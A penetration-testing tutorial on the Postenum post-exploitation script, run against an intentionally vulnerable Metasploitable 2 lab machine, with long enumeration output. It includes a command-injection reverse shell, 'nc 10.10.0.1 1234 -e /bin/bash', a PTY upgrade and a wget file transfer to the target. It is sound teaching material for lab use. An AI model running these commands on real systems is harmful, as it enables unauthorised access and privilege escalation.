Post-exploitation is often not quite as exciting as popping the initial shell, but it's a crucial phase for gathering data and further privilege escalation. Once a target is compromised, there's a lot of information to find and sift through. Luckily, there are tools available that can make the process easy. One such tool is Postenum.
To show everything Postenum has to offer for post-exploitation, we're using Kali Linux as our local machine. As for the target, if you want to follow along and try the tool out as a white hat or penetration tester, Metasploitable 2 is a good intentionally vulnerable virtual machine to use.
Phase 1: Initial Compromise
Before we can use Postenum, we must first exploit the target and get a shell. On Metasploitable 2, the command-injection page in DVWA lets us run operating system commands as the web server user (www-data), and we can abuse it to call back to a listener on our machine with a reverse shell.
We'll also want to upgrade that shell to a fully interactive one, for example by spawning a PTY with python -c 'import pty;pty.spawn("/bin/bash")', which gives us tab completion and command history. We'll assume the target has no direct internet access, so we need a way to transfer Postenum from our local machine.
First, grab the script from GitHub with the wget command:
~# wget https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh
--2020-06-18 16:14:29-- https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56110 (55K) [text/plain]
Saving to: ‘postenum.sh’
postenum.sh 100%[======================>] 54.79K --.-KB/s in 0.07s
2020-06-18 16:14:29 (749 KB/s) - ‘postenum.sh’ saved [56110/56110]
Next, we can start a simple server using Python to serve the file over HTTP. The command below is the Python 2 module; on a current Kali with Python 3 the equivalent is python3 -m http.server:
~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Back on the target system, let's move to a writable directory so we can download and run our script:
target:/var/vulnerabilities/exec$ cd /var/tmp/
target:/var/tmp$
Grab the file we are hosting, using our own machine's address (10.10.0.1 here) rather than the target's:
target:/var/tmp$ wget http://10.10.0.1:8000/postenum.sh
--16:16:24-- http://10.10.0.1:8000/postenum.sh
=> `postenum.sh'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 43,831 (43K) [text/x-sh]
100%[=================================================================================================================================================================================================>] 43,831 --.--K/s
16:16:24 (53.19 MB/s) - `postenum.sh' saved [43831/43831]
We should see the request where our server is running if everything was successful:
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.0.50 - - [18/Jun/2020 10:49:36] "GET /postenum.sh HTTP/1.0" 200 -
Press Ctrl-C to stop the Python server now that the transfer is done, and compare the byte count (or a checksum such as md5sum) on both ends to be sure the file arrived intact. Listing the directory shows the script isn't executable yet:
target:/var/tmp$ ls -la
total 52
drwxrwxrwt 2 root root 4096 Jun 16 13:35 .
drwxr-xr-x 14 root root 4096 Mar 17 2010 ..
-rw-r--r-- 1 www-data www-data 43831 Jun 18 2020 postenum.sh
Use the chmod command to make it executable:
target:/var/tmp$ chmod +x postenum.sh
And listing the directory again shows the execute bit is now set (-rwxr-xr-x):
target:/var/tmp$ ls -la
total 52
drwxrwxrwt 2 root root 4096 Jun 16 13:35 .
drwxr-xr-x 14 root root 4096 Mar 17 2010 ..
-rwxr-xr-x 1 www-data www-data 43831 Jun 18 2020 postenum.sh
To run it, use the dot-slash prefix so the shell executes the script from the current directory. If you can't set the execute bit (for example, because the directory is mounted noexec), bash postenum.sh works just as well, since the interpreter reads the file rather than executing it:
target:/var/tmp$ ./postenum.sh
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
Usage > ./postenum.sh <option>
Options >
-a : All
-s : Filesystem [SUID, SGID, Config/DB files, etc.]
-l : Shell escape and development tools
-c : The most interesting files
-n : Network settings
-p : Services and cron jobs
-o : OS informations and priv esc exploits
-v : Sofware's versions
-t : Fstab credentials and databases checker
That will give us a nice little banner and some usage options.
Phase 2: Network Settings
The first option we'll cover will gather networking information and settings. Use the -n switch to kick it off:
target:/var/tmp$ ./postenum.sh -n
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] COMMUNICATING and NETWORKING
[+] - Check NIC(s) does the system have
[x] Available network interfaces on the system:
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
auto eth0
iface eth0 inet static
address 10.10.0.50
netmask 255.255.255.0
gateway 10.10.0.1
[x] Hosts:
127.0.0.1 localhost
127.0.1.1 target.localdomain target
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
[+] - Check network configuration settings
[x] DNS name servers:
search localdomain
nameserver 172.16.1.1
[x] Networks:
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
[x] hostname:
target
[x] Get DNS domain or the FQDN:
localdomain
[+] - Check users and hosts communicating with the system
[x] Display all TCP/UDP connected socket, PID/program:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:41801 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:47536 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 10.10.0.50:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:44182 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:51902 0.0.0.0:* LISTEN -
tcp 0 0 10.10.0.50:34846 10.10.0.1:1234 ESTABLISHED 4789/bash
tcp6 0 0 :::2121 :::* LISTEN -
tcp6 0 0 :::3632 :::* LISTEN -
tcp6 0 0 :::53 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::5432 :::* LISTEN -
tcp6 0 0 ::1:953 :::* LISTEN -
udp 0 0 0.0.0.0:2049 0.0.0.0:* -
udp 0 0 10.10.0.50:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.10.0.50:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 127.0.0.1:47783 127.0.0.1:47783 ESTABLISHED -
udp 0 0 0.0.0.0:36136 0.0.0.0:* -
udp 0 0 0.0.0.0:945 0.0.0.0:* -
udp 0 0 10.10.0.50:53 0.0.0.0:* -
udp 0 0 127.0.0.1:53 0.0.0.0:* -
udp 0 0 0.0.0.0:52929 0.0.0.0:* -
udp 0 0 0.0.0.0:69 0.0.0.0:* -
udp 0 0 0.0.0.0:40927 0.0.0.0:* -
udp 0 0 0.0.0.0:55275 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp6 0 0 :::53 :::* -
udp6 0 0 :::50653 :::* -
[x] List files based on their Internet address:
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
bash 4789 www-data 0u IPv4 12807 TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
bash 4789 www-data 1u IPv4 12807 TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python 4797 www-data 0u IPv4 12807 TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python 4797 www-data 1u IPv4 12807 TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
[x] Last logged in users:
root pts/0 :0.0 Wed Jun 17 13:22 still logged in
reboot system boot 2.6.24-16-server Wed Jun 17 13:21 - 13:43 (00:21)
msfadmin tty1 Wed Jun 17 15:40 - down (00:00)
msfadmin tty1 Wed Jun 17 15:40 - 15:40 (00:00)
wtmp begins Wed Jun 18 15:38:50 2020
[x] Who is logged on and what they are doing:
13:43:00 up 22 min, 1 user, load average: 0.02, 0.04, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 :0.0 13:22 21:03m 0.05s 0.05s -bash
[+] - Check cached IP and/or MAC addresses
There's a lot here. It starts with the network interfaces (a static address of 10.10.0.50 with gateway 10.10.0.1), the hosts file, the resolver and symbolic network names, then the hostname and domain. The socket listing is the part worth studying: nearly every service is bound to 0.0.0.0 and is therefore reachable from the network, while only a few (the BIND control channel on 953 and one of the DNS listeners) are restricted to loopback. The PID/Program name column reads - for everything except our own shell because an unprivileged user can't see who owns other users' sockets. The single ESTABLISHED TCP connection, 10.10.0.50:34846 to 10.10.0.1:1234, is our reverse shell, and lsof attributes it to the bash and python processes we spawned; a defender reading the same output would spot it just as easily. Finally, last and w show who has logged in and who is active, and the cached IP/MAC check came back empty on this box.
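Reading a socket listing that long by eye is error-prone, and the question we actually care about is narrower: what is exposed to the network, and who is connected right now? The script below is an added example, not part of Postenum or this article's original output, that answers both from a netstat-style listing. Its sample input is a constructed, trimmed copy of the output above, and the function names (exposed_listeners, established_connections) are my own; on the target you'd pipe netstat -tuapn into them instead.

```bash
#!/bin/sh
# Added example, not part of postenum or the original article.
# Filters a netstat-style listing (the format postenum prints under
# "Display all TCP/UDP connected socket") down to two things a tester needs:
#   1. listeners bound to every interface (reachable from the network), and
#   2. established connections and who owns them.

# Constructed sample: a trimmed copy of the output shown above.
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.0.50:34846        10.10.0.1:1234          ESTABLISHED 4789/bash
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 ::1:953                 :::*                    LISTEN      -
udp        0      0 0.0.0.0:69              0.0.0.0:*                           -
udp        0      0 127.0.0.1:53            0.0.0.0:*                           -'

# Read a netstat listing on stdin; print "proto port" for each listening
# socket bound to the wildcard address (0.0.0.0 for IPv4, :: for IPv6).
# TCP rows carry a LISTEN state; UDP rows have no state column, so a UDP row
# whose foreign address is a wildcard ("*") counts as listening.
exposed_listeners() {
    awk '
        $1 ~ /^(tcp|udp)6?$/ {
            addr = $4
            n = split(addr, parts, ":")
            port = parts[n]
            host = substr(addr, 1, length(addr) - length(port) - 1)
            listening = ($1 ~ /^tcp/) ? ($6 == "LISTEN") : ($5 ~ /\*$/)
            if (listening && (host == "0.0.0.0" || host == "::"))
                print $1, port
        }'
}

# Read a netstat listing on stdin; print each established connection as
# "local -> remote owner". The owner is "-" when the kernel hides it from an
# unprivileged user, which is why only our own shell is attributed above.
established_connections() {
    awk '$6 == "ESTABLISHED" { print $4, "->", $5, ($7 == "" ? "-" : $7) }'
}

# Demo on the constructed sample. On the target: netstat -tuapn | exposed_listeners
echo "[*] listeners bound to all interfaces:"
printf '%s\n' "$SAMPLE_NETSTAT" | exposed_listeners
echo "[*] established connections:"
printf '%s\n' "$SAMPLE_NETSTAT" | established_connections
```

The loopback-only services (here the BIND control channel and one DNS listener) drop out of the first list on purpose: they are only reachable from a shell on the box, which is exactly the position we are now in, so they go on the local to-do list rather than the network one.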
Phase 3: Services & Cron Jobs
The next option we'll look at will discover running services and any cron jobs that are present on the system. Use the -p switch for this:
target:/var/tmp$ ./postenum.sh -p
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] APPS and SERVICES
[+] - Check jobs scheduled
[x] Search on cron in /etc:
drwxr-xr-x 2 root root 4096 Jul 5 2018 cron.d
drwxr-xr-x 2 root root 4096 Apr 28 2010 cron.daily
drwxr-xr-x 2 root root 4096 Mar 16 2010 cron.hourly
drwxr-xr-x 2 root root 4096 Apr 28 2010 cron.monthly
drwxr-xr-x 2 root root 4096 Mar 16 2010 cron.weekly
-rw-r--r-- 1 root root 724 Apr 8 2008 crontab
[x] List /etc/cron.d/
-rw-r--r-- 1 root root 507 May 3 2012 php5
-rw-r--r-- 1 root root 1323 Mar 31 2008 postgresql-common
[x] Root's cron jobs:
no crontab for www-data
[x] The content of /etc/crontab:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
[x] View daily cron jobs:
-rwxr-xr-x 1 root root 633 Feb 1 2008 apache2
-rwxr-xr-x 1 root root 7441 Apr 22 2008 apt
-rwxr-xr-x 1 root root 314 Apr 4 2008 aptitude
-rwxr-xr-x 1 root root 502 Dec 12 2007 bsdmainutils
-rwxr-xr-x 1 root root 89 Jun 17 2006 logrotate
-rwxr-xr-x 1 root root 954 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 183 Mar 8 2008 mlocate
-rwxr-xr-x 1 root root 383 Apr 28 2010 samba
-rwxr-xr-x 1 root root 3295 Apr 8 2008 standard
-rwxr-xr-x 1 root root 1309 Nov 23 2007 sysklogd
-rwxr-xr-x 1 root root 477 Dec 7 2008 tomcat55
[x] View monthly cron jobs:
-rwxr-xr-x 1 root root 664 Feb 20 2008 proftpd
-rwxr-xr-x 1 root root 129 Apr 8 2008 standard
[x] View weekly cron jobs:
-rwxr-xr-x 1 root root 528 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28 2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23 2007 sysklogd
[+] - Check for running services, and which service(s) are been running by root
[x] Display every process on the system:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.1 0.6 2844 1696 ? Ss 13:20 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S< 13:20 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 13:20 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< 13:20 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 13:20 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 13:20 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 13:20 0:00 [khelper]
root 41 0.0 0.0 0 0 ? S< 13:20 0:00 [kblockd/0]
root 44 0.0 0.0 0 0 ? S< 13:20 0:00 [kacpid]
root 45 0.0 0.0 0 0 ? S< 13:20 0:00 [kacpi_notify]
root 88 0.0 0.0 0 0 ? S< 13:20 0:00 [kseriod]
root 125 0.0 0.0 0 0 ? S 13:20 0:00 [pdflush]
root 126 0.0 0.0 0 0 ? S 13:20 0:00 [pdflush]
root 127 0.0 0.0 0 0 ? S< 13:20 0:00 [kswapd0]
root 169 0.0 0.0 0 0 ? S< 13:20 0:00 [aio/0]
root 1125 0.0 0.0 0 0 ? S< 13:20 0:00 [ksnapd]
root 1316 0.0 0.0 0 0 ? S< 13:20 0:00 [ata/0]
root 1318 0.0 0.0 0 0 ? S< 13:20 0:00 [ata_aux]
root 1327 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_0]
root 1340 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_1]
root 1345 0.0 0.0 0 0 ? S< 13:20 0:00 [ksuspend_usbd]
root 1353 0.0 0.0 0 0 ? S< 13:20 0:00 [khubd]
root 1771 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_2]
root 2295 0.0 0.0 0 0 ? S< 13:20 0:00 [kjournald]
root 2460 0.0 0.2 2216 652 ? S<s 13:20 0:01 /sbin/udevd --daemon
root 2706 0.0 0.0 0 0 ? S< 13:20 0:00 [kpsmoused]
root 3588 0.0 0.0 0 0 ? S< 13:21 0:00 [kjournald]
daemon 3717 0.0 0.2 1836 524 ? Ss 13:21 0:00 /sbin/portmap
statd 3737 0.0 0.2 1900 728 ? Ss 13:21 0:00 /sbin/rpc.statd
root 3743 0.0 0.0 0 0 ? S< 13:21 0:00 [rpciod/0]
root 3758 0.0 0.2 3648 564 ? Ss 13:21 0:00 /usr/sbin/rpc.idmapd
root 3985 0.0 0.1 1716 488 tty4 Ss+ 13:21 0:00 /sbin/getty 38400 tty4
root 3986 0.0 0.1 1716 492 tty5 Ss+ 13:21 0:00 /sbin/getty 38400 tty5
root 3990 0.0 0.1 1716 488 tty2 Ss+ 13:21 0:00 /sbin/getty 38400 tty2
root 3993 0.0 0.1 1716 492 tty3 Ss+ 13:21 0:00 /sbin/getty 38400 tty3
root 3996 0.0 0.1 1716 488 tty6 Ss+ 13:21 0:00 /sbin/getty 38400 tty6
syslog 4034 0.0 0.2 1936 648 ? Ss 13:21 0:00 /sbin/syslogd -u syslog
root 4069 0.0 0.2 1872 540 ? S 13:21 0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog 4071 0.0 0.8 3152 2052 ? Ss 13:21 0:00 /sbin/klogd -P /var/run/klogd/kmsg
bind 4094 0.0 3.0 35408 7676 ? Ssl 13:21 0:00 /usr/sbin/named -u bind
root 4116 0.0 0.3 5312 996 ? Ss 13:21 0:00 /usr/sbin/sshd
root 4193 0.0 0.5 2768 1304 ? S 13:21 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 4235 0.1 6.6 127560 17036 ? Sl 13:21 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root 4236 0.0 0.2 1700 556 ? S 13:21 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
postgres 4323 0.1 1.9 41340 5068 ? S 13:21 0:01 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres 4326 0.2 0.5 41340 1376 ? Ss 13:21 0:03 postgres: writer process
postgres 4327 0.2 0.4 41340 1188 ? Ss 13:21 0:03 postgres: wal writer process
postgres 4328 0.0 0.5 41476 1432 ? Ss 13:21 0:01 postgres: autovacuum launcher process
postgres 4329 0.0 0.4 12660 1172 ? Ss 13:21 0:00 postgres: stats collector process
daemon 4349 0.0 0.1 2316 424 ? SNs 13:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon 4350 0.0 0.0 2316 216 ? SN 13:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root 4399 0.0 0.0 0 0 ? S 13:21 0:00 [lockd]
root 4400 0.0 0.0 0 0 ? S< 13:21 0:00 [nfsd4]
root 4401 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4402 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4403 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4404 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4405 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4406 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4407 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4408 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4412 0.0 0.1 2424 332 ? Ss 13:21 0:00 /usr/sbin/rpc.mountd
daemon 4437 0.0 0.0 2316 216 ? SN 13:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon 4479 0.0 0.0 2316 216 ? SN 13:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root 4480 0.0 0.6 5412 1728 ? Ss 13:21 0:00 /usr/lib/postfix/master
postfix 4484 0.0 0.6 5420 1644 ? S 13:21 0:00 pickup -l -t fifo -u -c
postfix 4485 0.0 0.6 5460 1688 ? S 13:21 0:00 qmgr -l -t fifo -u
root 4487 0.0 0.4 5388 1204 ? Ss 13:21 0:00 /usr/sbin/nmbd -D
root 4489 0.0 0.5 7724 1364 ? Ss 13:21 0:00 /usr/sbin/smbd -D
root 4493 0.0 0.3 7724 812 ? S 13:21 0:00 /usr/sbin/smbd -D
root 4508 0.0 0.3 2424 856 ? Ss 13:21 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
proftpd 4545 0.0 0.6 9948 1592 ? Ss 13:21 0:00 proftpd: (accepting connections)
daemon 4559 0.0 0.1 1984 424 ? Ss 13:21 0:00 /usr/sbin/atd
root 4570 0.0 0.3 2104 896 ? Ss 13:21 0:00 /usr/sbin/cron
root 4598 0.0 0.1 2052 348 ? Ss 13:21 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 4599 0.0 0.1 2052 476 ? S 13:21 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
tomcat55 4601 5.3 44.8 389632 114652 ? Sl 13:21 1:12 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 4619 0.0 1.0 10596 2564 ? Ss 13:21 0:00 /usr/sbin/apache2 -k start
www-data 4621 0.0 0.9 10728 2516 ? S 13:21 0:00 /usr/sbin/apache2 -k start
www-data 4624 0.0 0.9 10728 2492 ? S 13:21 0:00 /usr/sbin/apache2 -k start
www-data 4626 0.0 0.8 10596 2096 ? S 13:21 0:00 /usr/sbin/apache2 -k start
www-data 4628 0.0 0.9 10596 2436 ? S 13:21 0:00 /usr/sbin/apache2 -k start
www-data 4629 0.0 0.9 10728 2500 ? S 13:21 0:00 /usr/sbin/apache2 -k start
root 4638 0.0 10.3 66344 26472 ? Sl 13:21 0:00 /usr/bin/rmiregistry
root 4642 0.5 1.0 12208 2568 ? Sl 13:21 0:08 ruby /usr/sbin/druby_timeserver.rb
root 4649 0.0 0.1 1716 488 tty1 Ss+ 13:21 0:00 /sbin/getty 38400 tty1
root 4657 0.0 0.9 8540 2372 ? S 13:21 0:01 /usr/bin/unrealircd
root 4659 0.3 4.7 14036 12016 ? S 13:21 0:04 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root 4664 0.0 0.4 2724 1188 ? S 13:21 0:00 /bin/sh /root/.vnc/xstartup
root 4667 0.0 1.0 5936 2572 ? S 13:21 0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 4670 0.3 1.9 8988 5000 ? S 13:21 0:05 fluxbox
root 4704 0.0 0.6 2852 1544 pts/0 Ss+ 13:22 0:00 -bash
www-data 4759 0.0 0.7 10596 1956 ? S 13:23 0:00 /usr/sbin/apache2 -k start
www-data 4780 0.0 0.7 10596 1956 ? S 13:29 0:00 /usr/sbin/apache2 -k start
www-data 4787 0.0 0.5 3248 1460 ? S 13:29 0:00 sh -c ping -c 3 localhost && nc 10.10.0.1 1234 -e /bin/bash
www-data 4789 0.0 0.5 3248 1448 ? S 13:29 0:00 bash
www-data 4797 0.0 0.9 3960 2472 ? S 13:31 0:00 python -c import pty;pty.spawn("/bin/bash")
www-data 4798 0.0 0.7 3400 1868 pts/1 Ss 13:31 0:00 /bin/bash
www-data 4927 0.0 0.7 3644 1888 pts/1 S+ 13:44 0:00 /bin/bash ./postenum.sh -p
www-data 4956 0.0 0.4 3616 1204 pts/1 S+ 13:44 0:00 /bin/bash ./postenum.sh -p
www-data 4957 0.0 0.3 2364 932 pts/1 R+ 13:44 0:00 ps aux
[x] Process binaries and permissions:
692K -rwxr-xr-x 1 root root 686K Apr 14 2008 /bin/bash
48K -rwxr-xr-x 1 root root 48K Apr 4 2008 /bin/dd
0 lrwxrwxrwx 1 root root 4 Apr 28 2010 /bin/sh -> bash
16K -rwxr-xr-x 1 root root 15K Apr 14 2008 /sbin/getty
92K -rwxr-xr-x 1 root root 88K Apr 11 2008 /sbin/init
24K -rwxr-xr-x 1 root root 23K Nov 23 2007 /sbin/klogd
16K -rwxr-xr-x 1 root root 15K Dec 3 2007 /sbin/portmap
40K -rwxr-xr-x 1 root root 39K Dec 2 2008 /sbin/rpc.statd
32K -rwxr-xr-x 1 root root 32K Nov 23 2007 /sbin/syslogd
72K -rwxr-xr-x 1 root root 67K Apr 11 2008 /sbin/udevd
32K -rwxr-xr-x 1 root root 31K May 21 2007 /usr/bin/jsvc
0 lrwxrwxrwx 1 root root 29 Apr 28 2010 /usr/bin/rmiregistry -> /etc/alternatives/rmiregistry
1.4M -rwx------ 1 root root 1.4M May 20 2012 /usr/bin/unrealircd
28K -rwxr-xr-x 1 root root 28K Apr 18 2008 /usr/lib/postfix/master
3.5M -rwxr-xr-x 1 root root 3.5M Mar 21 2008 /usr/lib/postgresql/8.3/bin/postgres
348K -rwxr-xr-x 1 root root 341K Mar 9 2010 /usr/sbin/apache2
16K -rwxr-xr-x 1 root root 16K Feb 20 2007 /usr/sbin/atd
32K -rwxr-xr-x 1 root root 31K Apr 8 2008 /usr/sbin/cron
7.1M -rwxr-xr-x 1 root root 7.1M Mar 28 2008 /usr/sbin/mysqld
